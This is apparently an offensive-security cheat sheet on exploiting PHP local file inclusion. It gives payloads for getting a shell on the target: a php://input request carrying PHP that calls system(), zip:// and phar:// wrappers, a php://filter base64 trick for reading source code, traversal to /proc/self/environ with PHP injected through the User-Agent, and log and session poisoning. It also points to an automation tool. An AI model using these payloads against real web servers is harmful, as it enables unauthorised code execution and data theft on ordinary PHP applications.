File Inclusion
PDF
LFI to shell
use
page=php://input
, payload must be in the POST Body (but the request is GET), e.g.<?php echo system('whoami');?>
, this is also possible forzip://
andphar://
get source code with filter:
page=php://filter/convert.base64-encode/resource=<filename>
page=../../../../../proc/self/environ
, if this is accessible we can set the user agent to php code in<?php .. ?>
and get it executed, this can also be done for/proc/self/id/<id>
and the referrer field (bruteforce the id)log poisoning, write php into log via error message and request via lfi
session poisoning, write a malicious session variable and include the session from
/var/lib/phpX/sess_<phpsessid>
Many of these techniques are automated and implemented in LFISuite.
Last updated